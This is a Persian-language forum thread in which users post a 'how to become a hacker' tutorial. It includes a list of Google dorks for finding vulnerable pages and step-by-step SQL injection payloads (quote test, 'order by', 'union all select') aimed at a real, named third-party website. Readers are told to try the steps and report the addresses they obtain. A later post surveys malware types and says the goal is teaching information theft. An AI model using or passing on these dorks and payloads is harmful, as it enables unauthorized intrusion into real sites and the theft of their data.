• اگر سمپادی هستی همین الان عضو شو :
    ثبت نام عضویت

چگونه هکر شویم. . . (آموزش)

وضعیت
موضوع بسته شده است.
  • شروع کننده موضوع
  • #1

erfan_ashorian

کاربر حرفه‌ای
ارسال‌ها
397
امتیاز
1,243
نام مرکز سمپاد
2
شهر
تهران
دانشگاه
_ان شا الله قوزاباد
رشته دانشگاه
_علوم کامپیوتر(البته در این
سلام. . .عاقا دیشب خواب بودم یه موجودی با دوبال اومد گفت برو تو سمپادیا یه تاپیک درباره هک باز کن (چشمام دو تا شه اگه دروغ بگم :D ) بعد خو منم گفتم چرا که نه!!
ببینید فقط چند تا چیز مهم:
1)کلا تو این تاپیک فقط لایک کنید :D پست ندید سوالم نپرسید که یه رواله مقاله واری داشته باشه یه تاپیک دیگه باز کردم به نام چگونه هکر شویم. . .(سوال) اون جا سوالاتونو بپرسید. . .
2)اگه نگرفت بدیهتا ادامه نمیدم :D چون هدفه ما زکات دادنه(آدم دروغگو :D) و خو اگه کسی نباشه برا چی بنویسم؟؟
خو ببینید اگه قبلا دنبال هک رفته باشید خوب میدونید که معمولا مقاله ها یا کامل نیستن یا قدیمین یا اصلا به درد نمیخورن!!
خو من اول سر فصل چیز هایی که یاد خواهیم داد:
1)مبانی شبکه:
1-1)پروتکلTCP/IPرا قورت دهید :))
1-2)پروتکل HTTPو آشتی با آن
1-3)FIREWALLپدر سوخته
2)حمله چیست؟دیفیس چیست؟من کیم؟این جا کجاست؟
2-1)اسکنر acunetix
2-2)cain
2-3)دستورات CMD
2-4)لینوکس هم چیزه خوبیست
2-5)ویروس چیست؟کیلاگر چیست؟تروجان چیست؟
3) SQLi یا چگونه لاشخور شم :))
4)Blind SQLi کوری هم عالمی دارد. . .
5)اسمه تو هم شد هکر یا FCKEDITOR
6)RFI
7)SSL
8)CSRF
9)LFI
10)XSS
11)IAC
12)من میخوام جان نش شوم(هش و کرک و .. . . )
13)ویروس نویسی/تروجان نویسی/
14)شبکه های بیسیم
خو عاقا من بازم یه سری نکات به ذهنم اومد:
3)بدیهتا من بیکار نیستم همه اینارو بنویسم تا جایی که بتونم فایل میزارم از جاهایه مختلف

4)اقا من نه با کسی کل دارم نه میخوام چیزیو اثبات کنم من کوچیکه همتونم هستم کسی هم اگه ایده ای چیزی داره برا من پ.خ کنه تا بنویسم. . .
5)بدیهتا حسش نیست من همش بیام بنویسم پس اگه تاخیر زیادی داشتم دیگه شرمنده . . . .
6)باز هم میگم چیزی که نشون میده شما علاقه دارید لایک هاتونه(که فعلا نداریم). . .


منابع:
1)anti securityمنبع کامل ایمیل:[email protected]
2)تیم امنیتی آشیانه(عشق است!)
3)مقاله های ناقص استاد آراز صمدی :))
4)تیم امنیتی شیشه با مقاله های خوبشون
5)اصول مهندسی اینترنت---احسان ملکیان
 
  • شروع کننده موضوع
  • #2

erfan_ashorian

کاربر حرفه‌ای
ارسال‌ها
397
امتیاز
1,243
نام مرکز سمپاد
2
شهر
تهران
دانشگاه
_ان شا الله قوزاباد
رشته دانشگاه
_علوم کامپیوتر(البته در این
پاسخ : چگونه هکر شویم. . . (آموزش)

پروتکلTCP/IPرا قورت دهید
خو ببینید تو نت منابع و مراجعه زیادی برا این هست. تو این جام:http://www.sampadia.com/forum/index.php/topic,93886.0.htmlظاهرا اوایل تاپیکه خوبی بوده بعد ول شده. . .
. . پیشنهادم اینه که خودتون برید و بخونیدشون ولی خو اگه حسش نبود و اینا!!!من یه سری توضیحات کوچولو میدم:
ببینید این پروتکل چهار لایس:(به ترتیب...ترتیب مهمه)
1)کاربردی2)انتقال3)اینترنت4)پیوند
توضیحات:لایه ی کاربردی:
خو از اسمش پیداس!کاربردیه یعنی یه سری برنامه ها ضروری و اصلی رو این لایه میان بالا...پروتکل ها EMAIL وHTTPهم دقیقا تو همین پروتکلند
2)انتقال
ببینید بیشتر کارش اینه که مطمعن شه قطعی نشه امنیت بالا باشه و پاکت ها به مقصد برسند
3)اینترنت:خو این اطلاعات و میبره به مقصد
4)پیوند:بیشتر به چیزهای جانبی سیستم (به قوله یه یارویی مسائل فیزیکیش مربوطه) بیخیش!!
خو بریم اصله مطلب:
IP
هر سیستمی تو شبکه یه IPداره که به وسیله ی اون شناخته میشه یه چیزی تو مایه هایه شناسنامه هر آدرس IPبرابر 32 بیته
(در حاله کامل شدن )
 
  • شروع کننده موضوع
  • #3

erfan_ashorian

کاربر حرفه‌ای
ارسال‌ها
397
امتیاز
1,243
نام مرکز سمپاد
2
شهر
تهران
دانشگاه
_ان شا الله قوزاباد
رشته دانشگاه
_علوم کامپیوتر(البته در این
پاسخ : چگونه هکر شویم. . . (آموزش)

خو طی تعاملات بسیار به این نتیجه رسیدم که اگه بخوام همه اینارو بنویسم خیلی طول میکشه برا همین هر بار که میرم یه سایتی چیزی هک کنم روشی که بکار بستم و مینویسم و لینک میکنم به بالا. . .
خو بریم سره بحثه خودمون:
sql injection یا چگونه لاشخور شویم ؟
اول بگم کسایی که میرن با هویج هک میکنن و از این روش استفاده میکنن یک مشت جوجن!(البته خو بعضیام گش...دن و خو ازش کمک میگیرن)
خو ببینید من خیلی مجبورم کوتاه و خلاصه و اینا بگم و متنفر از این کار و شمارو قسم میدم اگه اینو میخونید بعدا برید تحقیق کنید که هر کودوم از این کارا برای چیه . . .
خو ببینید ما اول میخوایم یه تارگت آسیب پذیر پیدا کنیم . .
خو ببینید از دوک هایه گوگل استفاده میکنیم....یه سری دورک هایه خوب اینان:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:Ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
خو بعد از این که یه تارگت رو انتخاب کردید حالا باید ببینیم اسیب پذیره یا نه برا این کار دورا داری:
1)
علامت ' رو تهه آدرس بزارید بعد صفحه رو لود کنید اگه با ارور اومد که خوبه به درد میخوره بی ارور اومد و کامل لود شد به درد نمیخوره. . .
مثال:
'http://www.clanwilliam.info/index.php?id=1
2)
یه گزاره ی احمقانه بش میگیم ببینیم چی میگه:
and 1=0
مثال:
http://www.clanwilliam.info/index.php?id=-1+and 1=0
http://www.clanwilliam.info/index.php?id=-1 and 1=1
این منفی ای که من پست یک گذاشتم و شمام بزارید خوبه بعدا میفهمید چرا!!(نزار ببین چی میشه بعدا نه الان)خو صفحه ی اول باید کامل لود نشه دومی باید کامل بشه . .
3)
تعداد کولومن هارو میشماریم:
بدین گونه :
http://www.clanwilliam.info/index.php?id=-1+order+by+1,2,3,....n--
خو این منفیه به درد همینجا میخورد. . .
خو ببینید این nباید عددی باشه که از اون به قبل (یعنی تا 1) ارور نگیرید دیگه . . .خو برا این کار پیشنهادم الگوریتم دودوییه اما خوب میتونیدم از 1 تکتک nو اونقدر زیاد کنید که به اولین عددی برسید که ارور بده عدده کولومن ها دقیقا عدده قبلیه ماست بدیهتا!!
4)
کولومن هایی که میتونیم استفاده کنیم و پیدا کنید:
http://www.clanwilliam.info/index.php?id=-1+union+all+Select+1,2,3,4,5,6,7--
خو دقت کنید منفیرو اگه این جا نزارید هیچی براتون نمیاد . . .خو ببینید وقتی اینو تزریق کنید یه کولومن بتون میده اونو یادداشت کنید. ..راستی 7 عدده قبلیه بودا!!!
خو تا همین جا بسه!!!
البته ادامه داره ها!!میخوام ببینم چند نفر حواسشون هست....اقا بروبچس برید همین کارایی که تا الان گفتم و بکنید جاییم نفهمید تو چگونه هکر شویم؟ . . .(سوال) بپرسید بعد آخرین ادرسی که بدست اووردید و تو چگونه هکر شویم؟. . . (سوال) بنویسید . . .خو اون جا برا بقیه توضیح بدید چه کردید و چه چیزایی و اومد و اینا تا همه با هم یاد بگیرید..
فدا
راسی اگه استقبال همین جوری باشه ادامه . . . .
 

Freemason

کاربر نیمه‌حرفه‌ای
ارسال‌ها
183
امتیاز
397
نام مرکز سمپاد
شهید مدنی
شهر
تبریز
دانشگاه
شریف
رشته دانشگاه
IT یا الکترونیک
پاسخ : چگونه هکر شویم. . . (آموزش)

این تاپیکی هست که باب میل من و بعضی ها هست. اجازه بدید همکاری کنیم. قبل از همه لازم دونستم تا مفاهیم اولیه و فرهنگ اصطلاحات این مبحث سخت و در عین حال شیرینو رو بگم.
خب شروع می کنیم.

فرهنگ اصطلاحات:
1. scan: یعنی سایت رو مورد آنالیز قرار بدیم و باگ ها و راه های نفوذ رو پیدا کنیم.
2. target : بدیهی است؛ یعنی هدف. بعضی ها victim هم میگن.
3. Bug : یعنی یک حفره در کدنویسی که میشه از طریق اون نفوذ کرد. دوستمون در اول از یکی از مشهورترین باگ ها به نام sql توضیحاتی داده.
4. Exploit : یک کد مخرب است که میشه با استفاده از اون به حفره نفوذ کرد.
5. Metasploit :برنامه ای که میشه از طریق اون اکسپلویت های خودمونو بنویسیم.
6. local root : برنامه ای که میشه از طریق اون به حفره ی نرم افزار نفوذ کرد.
7. MD5 : پسوندی هست که به صورت encrypt میباشد، مثل: c5a712c357eed057a8995558818144bf
8. Deface : به تغییرات ظاهری صفحه ی لاگین سایت میگن دیفیس.
 
  • شروع کننده موضوع
  • #5

erfan_ashorian

کاربر حرفه‌ای
ارسال‌ها
397
امتیاز
1,243
نام مرکز سمپاد
2
شهر
تهران
دانشگاه
_ان شا الله قوزاباد
رشته دانشگاه
_علوم کامپیوتر(البته در این
پاسخ : چگونه هکر شویم. . . (آموزش)

به نقل از ! Amir ! :
این تاپیکی هست که باب میل من و بعضی ها هست. اجازه بدید همکاری کنیم. قبل از همه لازم دونستم تا مفاهیم اولیه و فرهنگ اصطلاحات این مبحث سخت و در عین حال شیرینو رو بگم.
خب شروع می کنیم.

فرهنگ اصطلاحات:
1. scan: یعنی سایت رو مورد آنالیز قرار بدیم و باگ ها و راه های نفوذ رو پیدا کنیم.
2. target : بدیهی است؛ یعنی هدف. بعضی ها victim هم میگن.
3. Bug : یعنی یک حفره در کدنویسی که میشه از طریق اون نفوذ کرد. دوستمون در اول از یکی از مشهورترین باگ ها به نام sql توضیحاتی داده.
4. Exploit : یک کد مخرب است که میشه با استفاده از اون به حفره نفوذ کرد.
5. Metasploit :برنامه ای که میشه از طریق اون اکسپلویت های خودمونو بنویسیم.
6. local root : برنامه ای که میشه از طریق اون به حفره ی نرم افزار نفوذ کرد.
7. MD5 : پسوندی هست کهبه صورت encrypt میباشد، مثل: c5a712c357eed057a8995558818144bf
8. Deface : به تغییرات ظاهری صفحه ی لاگین سایت میگن دیفیس.
دوست خوبم کارت خیلی خوب و عالی اما اون اولین پست رو ظاهرا نخوندی . . .من میخوام ترتیب حفظ بشه والان شما تقریبا....بله! ترتیبو به هم زدی :|
 
  • شروع کننده موضوع
  • #6

erfan_ashorian

کاربر حرفه‌ای
ارسال‌ها
397
امتیاز
1,243
نام مرکز سمپاد
2
شهر
تهران
دانشگاه
_ان شا الله قوزاباد
رشته دانشگاه
_علوم کامپیوتر(البته در این
پاسخ : چگونه هکر شویم. . . (آموزش)

اقا هر کی میخواد همکاری کنه و پست بده بگه تا به هر کی یه چی بدیم که هر کس همونو بنویسه . . .
 

Freemason

کاربر نیمه‌حرفه‌ای
ارسال‌ها
183
امتیاز
397
نام مرکز سمپاد
شهید مدنی
شهر
تبریز
دانشگاه
شریف
رشته دانشگاه
IT یا الکترونیک
پاسخ : چگونه هکر شویم. . . (آموزش)

خب شروع می کنیم. اول پروتکل و ping و مفاهیم اولیه و ساده. نخواستم اینجا بنویسم چون دیدم زیاد میشه. اما اینرو دانلود کرده و خوب بخونین. واسه شروع خوب توضیح داده نسبت به مقالات آشیانه.

آموزش مفاهیم اولیه
 

Freemason

کاربر نیمه‌حرفه‌ای
ارسال‌ها
183
امتیاز
397
نام مرکز سمپاد
شهید مدنی
شهر
تبریز
دانشگاه
شریف
رشته دانشگاه
IT یا الکترونیک
پاسخ : چگونه هکر شویم. . . (آموزش)

خب دوستان اسقبال چندانی نمیشه ولی ما ادامه می دیم. هر کی خواست استفاده می کنه. :D
پروتکل رو در بخش قبلی گذاشتم برین بخونین.
حالا میریم سراغ حمله و دیفیس و ...
خب ببینین حملات متفاوته. اصلاً سلسله مراتب داره به این صورت که اول اسکن و یافتن باگ بعدش متناسب با اون باگ حمله.
حالا حمله ممکنه حمله به مودم وایرلس باشه و یا حمله به سایت باشه و یا حتی ممکنه که حمله به سرور و کامپیوتر شخصی باشه.
با جلو رفتن در مورد همش صحبت خواهیم کرد.

خب حالا فرض کنین می خوایم به یک سایت نفوذ کنیم. اول گفتم که باید باگ اونو پیدا کنیم که از نوع چیه؟
حالا فرض کنین سایت، سایت معلم شما نیست که با یک ساعت نشستن پشت کامپیوتر بتونی اسکنش کنی. مثلاً سایت یک شرکت حمل و نقل بین المللی هست. اون وقت چی؟؟؟!! با یک ساعت که حل نمیشه. حالا هکر ها اومدن نرم افزاری طراحی کردن که کار من و شما رو آسون می کنه.
Acunetix نرم افزاری هست برای این کار. عکس محیطشو ضمیمه کردم. تو این مثال خواستم نحوه ی کارشو بگم. تو این عکس من یک سایتو اسکن کردم که باگ SQL داره.

acunetix_test.png

می بینین که این نرم افزار کار ما رو آسون می کنه.
دستورات CMD خودش یک تاپیکه. تو خود سمپادیا می خواستن بحث کنن دیدن نمیشه. چون واقعاً بحثش زیاده. من خودم کامل بلد نیستم همشو.
CMD

حالا میریم سراغ لینوکس..
لینوکش خودش مثل ویندوز یک OS هست. تاپیک مخصوص لینوکس ها اینجا هست؛ سوال خاصی داشتین با در اونجا یا در قسمت سوال این تاپیک بپرسین.
ببینین با هر سیستم عامل لینوکسی میشه هک کرد ولی قبلش باید مواد خام مورد هکو داشته باشی تا بتونی هک کنی. واسه این کار کلی باید دانلود کنی.
اما سیستم عمال بک ترک (Back Track) خودش به طور پیش فرض از اول داره همه ی اونارو. یعنی بک ترک قوی ترین سیستم عامل هک هست.
از اینجا می تونین back track 5R3 رو دانلود کنین.
اینجا هم آموزش خود سایت هست.
ان شاءالله در پست بعدی در مورد ویروس، انواع ویروس و ویروس نویسی و روش هک با اونو می گم.


موفق باشید.
 

Freemason

کاربر نیمه‌حرفه‌ای
ارسال‌ها
183
امتیاز
397
نام مرکز سمپاد
شهید مدنی
شهر
تبریز
دانشگاه
شریف
رشته دانشگاه
IT یا الکترونیک
پاسخ : چگونه هکر شویم. . . (آموزش)

قسمت ویروسو چند پارت می خوام بکنم:
1. آشنایی با ویروس و تاریخچه ی آن
2. کار با rinlogger
3. crypt و crypter

خب تو این پست به قسمت اول می پردازیم:

اهداف
1. آشنایی با انواع بدافزارها
2. آشنایی با نحوه ی عملکرد آنها

آشنایی با انواع تهدیدات و بدافزارها
بدافزار (Malware) برنامه ای رایانه ای است که با اهداف بداندیش (Malicious) توسط یک شخص یا گروه برنامه نویس حرفه ای تولید می شود. این اهداف بداندیش می تواند شامل آزار کاربران، کند شدن سیستم، ایجاد خسارت، سرقت اطلاعات، ایجاد اختلال و حتی خسارت زدن به سخت افزار باشد. هدف ما تو این آموزش ها، آموزش نحوه ی سرقت اطلاعات هست.

تاریخچه
تولید اولین بدافزارها به دهه ی 80 میلادی باز می گردد. دورانی که استفاده از رایانه و شبکه های ارتباطی ایم گونه شیوع پیدا نکرده بود و البته بدافزارهای آن زمان هم، پیچیدگی فعلی خود را پیدا نکرده بودند. اما به مرور و با پیدایش سازوکارهای مختلف عملکرد در بدافزارها، انواع مختلفی از بدافزارها پدید آمد.

نحوه ی انتشار
بدافزارها از راه های مختلفی منتشر و تکثیر می شوند؛ اما به طور کلی دو بستر انتشار را انتخاب می کنند:
1. از طریق سخت افزارهای ذخیره سازی قابل اتقال مثل فلاپی دیسک ها، حافظه های فلش، CD و تلفن همراه
2. انواع شبکه های اطلاعاتی مثل اینترنت، شبکه های محلی، و حتی بلوتوث موبایل ها.
البته هر یک از این بسترهت خود شامل بسیاری از تکنیک ها جهت انتشار می باشد. به عنوان مثال یکی از بدافزارهای رایج فعلی، یک کرم رایانه ای است که از طریق ایجاد فایل Autorun خود را منتشر می کند. وقتی فایل Autorun.inf در درایو اصلی یک سخت افزار (اعم از هارد دیسک، حافظه فلش یا CD) قرار گیرد، با ورود به درایو آن، باعث اجرای یک یا چند فایل اجرایی می گردد. این روشی معمولاً در CD ها برای اجرای خودکار آنها استفاده می شود. این کرم رایانه ای نیز با استفاده از این روش، از طریق سخت افزارهای مختلف خود را منتشر می کند. در استفاده از سایتهای اینترنتی نیز خیلی اوقات ممکن است پیوند یا نرم افزار بارگیری شده، حاوی بدافزار بوده و بر روی سیستم شما قرار گیرد.

انواع بدافزارها
بدافزارها از لحاظ عملکرد، نحوه ی انتشار، هدف تخریب و ... به انواع مختلفی تقسیم می شوند.

1. ویروس (Virus)
از اولین انواع بدافزارها می باشد. علت نام گذاری ویروس به این نام، تشابه زیاد عملکد آن با ویروس های بیولوژیکی بوده است. ویروس بعد از ورود به رایانه، به طور خودکار فعال شده و فایل های دیگر را آلوده می کند. ویروس به طور مستقل قادر به حیات نمی باشد و برای ادامه فعالیت و انتشار نیاز به یک میزبان (Host) دارد. این میزبان، ممکن است یک بوت سکتور (قسمتی از یک دیسک که رایانه هنگام راه اندازی به آن نیاز دارد)، فایل اجرایی، فایل سند (مثل صفحات وب یل فایل های آفیس) باشد. به طور خلاصه دو ویژگی اصلی ویروس، انتشارپذیری و نیاز به فایل میزبان است.
بعضی از ویروس ها در حافظه مقیم شده و دیگر فایل ها را تحت تاثیر قرار می دهند و بعضی دیگر در هنگام اجرای فایل میزبان شروع به کار می کنند. وقتی یک ویروس شروع بع فعالیت می کند در ابتدا به دنبال فایل هایی می گردد که می تواند خود را به آنها بچسباند (Bind) و این بستگی به نحوه ی عملکرد ویروس دارد. مثلاً برخی ویروس ها به فایل های اجرایی (exe و com) حمله می کنند و ویروس های ماکرو به فایل هایی که دارای ماکرو هستند (مثل فایل های excel) حمله می برند. سپس ویروس کد خود را وارد کد فایل میزبان می کند و به کمک آن انتشار می باید.
نحوه ی اضافه شدن کد ویروس به فایل میزبان نیز متفاوت است. بعضی از ویروس ها کد خود را به ابتدا و یا انتهای فایل اضافه می کنن؛ بعضی دیگر نیز کد خود را بر روی کد فایل می نویسند.
بسیاری از ویروس ها بعد از انتشار، با رخ دادن اتفاقی خاص (مثلاً در یک زمان خاص) شروع بع تخریب می کنند و مثلاً فایل های موجود بر روی رایانه را حذف می کنند و یا در موارد معدودی آسیب های سخت افزاری وارد می کنند (مثل ویروس Chernobyl). بعضی دیگر نیز فقط فایل ها را آلوده می سازند. بسته به نحوه ی آلودگی ممکن است فایل های آلوده قابل پاک سازی باشند. اما مثلاً فایل هایی که میزبان ویروس هایی می باشند که کد خود را بر روی اطلاعات فایل می نویسند دیگر قابل پاک سازی نیستند.
ویروس ها از روش های مختلفی جهت مخفی نگه داشتن خود استفاده می کنند. برخی ویروس ها کد خود را رمزگذاری (Encryption) می کنند تا از دسترس دیگران دور باشد. ویروس های چند شکلی نیز هم هر بار یک شکل در میآیند تا رد آنها قابل پیگیری نباشد. البته نرم افزارهای ضد ویروس هم روش های پیچیده ای را برای عبور از تکنیک های استتار ویروس ها به کار می بندند و بسیاری از این سدها را می شکنند.
برای این که یک برنامه به عنوان ویروس شناخته شود، فقط کافیست که آن برنامه در ساختار خود ارای یک قسمت تکثیر کننده باشد که برنامه را تکثیر کند تا بتواند سایر برنامه های دیگر را آلوده کند. اما در واقع ویروس ها در ساختار دارای 4 قسمت اصلی می باشند:

الف)واحد پنهان کننده: یک برنامه گمراه کننده که باعث می شود ویروس بتواند خود را در رایانه پنهان کند.

ب)واحد تکثیر کننده: یک برنامه تکثیر کننده که به وسیله آن ویروس می تواند خود را تکثیر کرده و برنامه های
بیشتری را آلوده کند.

ج)واحد فعال کننده: یک کلید فعال کننده که باعث می شود ویروس در زمان خاص یا بعد از انجام عمل
خاصی فعال شود.

د)واحد اجرایی: قسمت اجرایی ویروس که ممکن است فقط یک نمایش بدون خطر باشد و یا یک برنامه
خطرناک که باعث وارد شدن صدمه به سیستم شود.

ویروس نویسان از ابزارهای مختلفی برای نوشتن ویروس استفاده می کنند. تقریباً همه ی زبان های برنامه نویسی این قابلیت را دارند که در خدمت یم ویروس در آیند. البته قدرت زبان های برنامه نویسی نیز در انتخاب آن و قدرت محصول نهایی (ویروس) بسیار موثر است.
از جمله رایج ترین زیان های رایج در ویروس نویسی، Visual Basic، Visual ++C و زبان های اسکریپت نویسی مثل Java Script هستند. عده ای از ویروس نویسان نیز علاقه مندند از زبان های سطح پایین تر استفاده کنند. در این مورد، معمولاً از زبان های C و Assembly استفاده می شود.
برنامه نویسی با این زبان ها بسیار مشکل تر زبان های پیشرفته است، اما به دلیل نزدیکی این زبان ها به زبان ماشین، برنامه های بسیار قوی تر را می توان با این زبان ها نوشت.
همچنین ویروس نویسان حرفه ای اقدام به انتشار ابزارها و برنامه های تخصصی ویروس نویسی برای ویروس نویسان غیرحرفه ای کرده اند. این برنامه ها که مخصوص نوشتن ویروس است امکاناتی را جهت سهولت نوشتن یک ویروس ارایه می دهد. البته قدرت و کارایی ویروس های نوشته شده با این برنامه ها بسیار کمتر از دیگر ویروس ها است.

2. کرم رایانه ای (Worm)
کرم ها بد افزار هایی هستند که به صورت خودکار قابلیت تکثیر دارند؛ اما بر حلاف ویروس ها، نیازی به فایل میزبان نداشته و به صورت یک فایل مستقل ظاهر می شوند. پس کرم ها را بر اساس دو خصوصیت اصلی مستقل بودن و تکثیر خودکار می شناسیم.
ظهور اولین کرو ها به اوخر دهه 80 میلادی، یعنی کمتر از 30 سال قبل بر می گردد. کرم ها بیشتر از طریق شبکه های رایانه ای منتشر
می شوند و یکی از مهم ترین اثرات مخربشان هم مربوط به شبکه ها است که با تکثیر شدید خود ایجاد ترافیک سنگینی در شبکه های مختلف مثا اینترنت کرده و آن را مختل می کنند. همچنین کرم ها اقدام به کارهای مختلف دیگری مثل حذف فایل های رایانه ای آلوده و حتی ارسال مستندات کاربر از طریق ایمیل می شوند.
همان طور که بیان شد بیشتر کرم ها از طریق شبکه های ارتباطی و اینترنت منتشر می شوند. باز کردن یک ایمیل آلوه که مثلاً کرم، خود را به آن ضمیمه کرده است و یا کلیک بر روی یک لینک وب که به آدرس خاصی اشاره دارد از راه های گسترش کرم است. حتی برخی از کرم ها از طریق نرم افزارهای چت و پیام رسانی خود را تکثیر می کنند. تعداد کمی از کرم ها هم هیچ نیازی به دخالت کاربر برای انتشار ندارند و به صورت کاملاً مستقل منتشر می شوندو همچنین کرم ها از طریق سخت افزارهای انتقال اطلاعات هم تکثیر می شوند.
ممکن است کرم ها فقط با تکثیر سریع خود فعالیت های یک شبکه یا رایانه را مختل کنند. مثلاً با ورود به هر پوشه، یک فایل درون آن ابجاد کنند. اما کرم های خطرناکی تری هم هستند که که اقدام به حذف فایل های کاربر قربانی و حتی ارسال کپی خود برای آدرسهایی که کاربر از طرف آنها ایمیل دریافت داشته یا به آنها ایمیل ارسال کرده است.

3. تروجان (Trojan)
از دیگر انواع تهدید های نرم افزاری، تروجان ها هستند. نام این بدافزار از یک افسانه اخذ شده که طی آن یونانی ها در جنگ با دشمنان، شهر تروآ را محاصره کرده بودند، یک اسب چوبی بزرگ به آنها هدیه می دهند. دشمنان پس از بازگشت یونانی ها، اسب را به داخل شهر می آورند. شب هنگام، سربازان یونانی که داخل آن مخفی شده بودند از آن خارج شده و دروازه های شهر را برای دیگر سربازان باز می کنند.
نحوه ی عمل تروجان ها هم مشابه این حقه ی یونانی ها است. یعنی یک تروجان با ورود به یک رایانه، با در دست گرفتن بسیاری از کنترل ها و نقاط حساس، می تواند ضربه های خطرناکی را وارد کند.
تروجان ها بر خلاف ویروس ها و کرم ها قابلیت تکثیر ندارند؛ اما به صورت یک برنامه مستقل، یا زیر برنامه ای درون یک برنامه مجاز دیگر قرار
می گیرند و در صورت اجرا فعال می شوند. تروجان ها هنگام فعالیت، مجموعه ای از فعالیت ها را انجام می دهند و از این لحاظ می توانند بسیار خطرناک باشند.تروجان ها علاوه بر کارهای معمول که توسط هر ویروس ها انجام می گیرد (مثل حذف فایل ها)، معمولاً این امکان را دارند که با سرویس دهنده خود اعم از یک سایت یا شخص، ارتباط برقرار کرده و به عنوان واسطه، کار هایی را که او می خواهد انجام دهند. کارهایی دیگری مثل بارگیری ویروس ها و بدافزارهای دیگر و حتی جمع آوری اطلاعات مهم و شخصی کاربر مثل فایل های شخصی، رمزهای عبور، آدرس های ایمیل، شماره کارت های اعتباری و حساب های بانکی و فرستادن آن به آدرسی خاص از دیگر فعالیت های تروجان ها است.
تروجان ها برای جلوگیری از شناخته شدن توسط کاربر کار های مختلفی انجام می دهند. ساده ترین این کارها، انتخاب نام های شناخته شده و شبیه فایلهای سیستم عمال استو مثلاً فرض کنید تروجانی که نام خود را Winlogon.exe و یا Svchost.exe انتخاب کند. در این صورت هم احتمال اجرای آن توسط کاربر وجود دارد و هم وقتی کاربر فایل های موجود در حافظه رم رایانه را میبیند (Task manager) به ماهیت آن ها شک نکند. در روش های پیشرفته تر، تروجان خود را به یک فایل یک برنامه می چسباند و بدین ترتیب، کاربر با اجرای یک نرم افزار بی خطر، ناخواسته یک تروجان را بر روی دستگاه خود فعال می کند. در بعضی موارد، اتصال به یک برنامه با عملیات رمزگذاری تکمیل می شود و خود را از نرم افزارهای ضدویروس مخفی می کند.
تروجان ها انواع مختلفی دارند. بعضی از آن ها شبیه نرم افزارهای جاسوس (جاسوس افزارها) هستند. این دسته از تروجان ها می توانند هنگام وارد کردن روز عبور، آن را ثبت کرده و به همرا اطلاعات دیگری مثل IP رایانه، شماره های تلفن و ... برای مهاجم بفرستند و برخی تمامی کلیدهای فشرده شده توسط کاربر را ذخیره می کنند و به آدرس خاصی ارسال می کنند. بعضی دیگر که به تروجان های کلیک کننده (Clicker Trojan) معروفند با فرستادن دستوری خاص برای مروگر وب، کاربر را به آدرس های خاص اینترنتی هدایت می کنند و این کار با اهداف تبلیغاتی (افزایش تعداد بازدید از یک سایت) و مخرب (در صورتی که سایت مذکور آلوده باشد) انجام می گیرد.

4. جاسوس افزار (Spyware)
بدافزارهایی هستند که می توانند با جمع آوری اطلاعات مختلفی از کاربر بدون اطلاع وی و فرستادن آن برای فرد دیگر، خساراتی زیادی وارد کنند. این بدافزار، شامل انواع مختلفی از نزم افزارهای جاسوسی، نرم افزارهای تبلیغاتی (Adware) و ... می شود. به خاطر مخفی یا ظاهراً بی خطر بودن این نرم افزارها، عملاً مقابله چندانی از طرف کاربران با آن صورت نمی گیرد و در نتیجه شیوع بسیاری دارند. اما اگر کاربران به خطرات این بدافزارها واقف باشند قطعاً تمهیداتی برای مقابله با آن خواهند اندیشید.
بعضی از انواع این بدافزار، به صورت کاملاً مخفیانه برو روی رایانه قربانی نصب می شوند و اطلاعات مختلفی مثل سایت های مورد بازدید، کلمه های عبور، اطلاعات شخصی و امنیتی، مشخصات سخت افزاری سیستم، نرم افزارهای مورد استفاده، لیست کامل آدرس های ایمیل، شماره کارت های اعتباری و حساب های بانکی و شماره های تلفن و هر اطلاعات دیگری را جمع آوری و در هنگام اتصال به اینترنت، به محل مشخصی ارسال می کنند. بعضی دیگر به عنوان قسمتی از یک نرم افزار رایگان و یا نرم افزار تبلیغاتی (مثلاً یک Screen Saver) توسط کاربر بارگیری و نصب شده و بدون اطلاع کاربر، اطلاعات وی را ارسال می کنند. این نرم افزار ممکن است حتی در قالب یک نوار وظیف برای مرورگر وب (نرم افزارهایی مثل Yahoo! Toolbar) به فعالیت بپردازند.
جاسوس افزارها کارهای مختلفی از جمله هدایت جست و جوهای تت وب به سایت های خاص، تغییر صفحه ی اول مرورگر وب (Home Page) به آدرسی مشخص، بارگیری تبلیغات از اینترنت و نمایش آن حتی در مواقعی که کاربر به اینترنت متصل نمی باشد، تصویربرداری از صفحه ی نمایش به منظور ثبت فعالیت های کاربر و آدرس های ایمیل مرتبط با وی ثبت کلید ها و کلمات عبور مورد استفاده و ... است.
بعضی از این اطلاعات مثل سایت های مورد استفاده با اهداف تجاری و به منظور فروش مشخصات فرد به سایت های مربوطه انجام می شود. یعنی جاسوس افزار متناسب با فعالیت اینترنتی کاربر، اطلاعات وی را به شرکت هایی که در همان حوزه ها فعالیت می کنند می فروشد. ممکن است اطلاعات دیگری از قبیل شماره حساب بانکی و شماره کارت های اعتباری برای سوء استفاده های مالی مورد اسفاده قرار بگیرد و اطلاعات دیگری که می تواند به یک مهاجم برای حمله به قربانی و در اختیار گرفتن رایانه او مورد استفاده قرار بگیرد.

5. آگهی افزار (Adware)
همانطور که از اسم این بدافزار بر می آید، هدف اصلی ایجاد آن، تبلیغات و نمایش پیام های تبلیغاتی است. آگهی افزار ها ممکن است از طریق برنامه های رایگان که از اینترنت باریگیری می شوند، بر روی رایانه قرار گیرند. پس آگهی افزار ممکن است به صورت مستقل یا درون یک برنامه دیگر مننشر گردد. این نوع بدافزار عموماً خطری برای رایانه نداشته و ممکن است کارایی و سرعت سیستم شما را کاهش دهد.
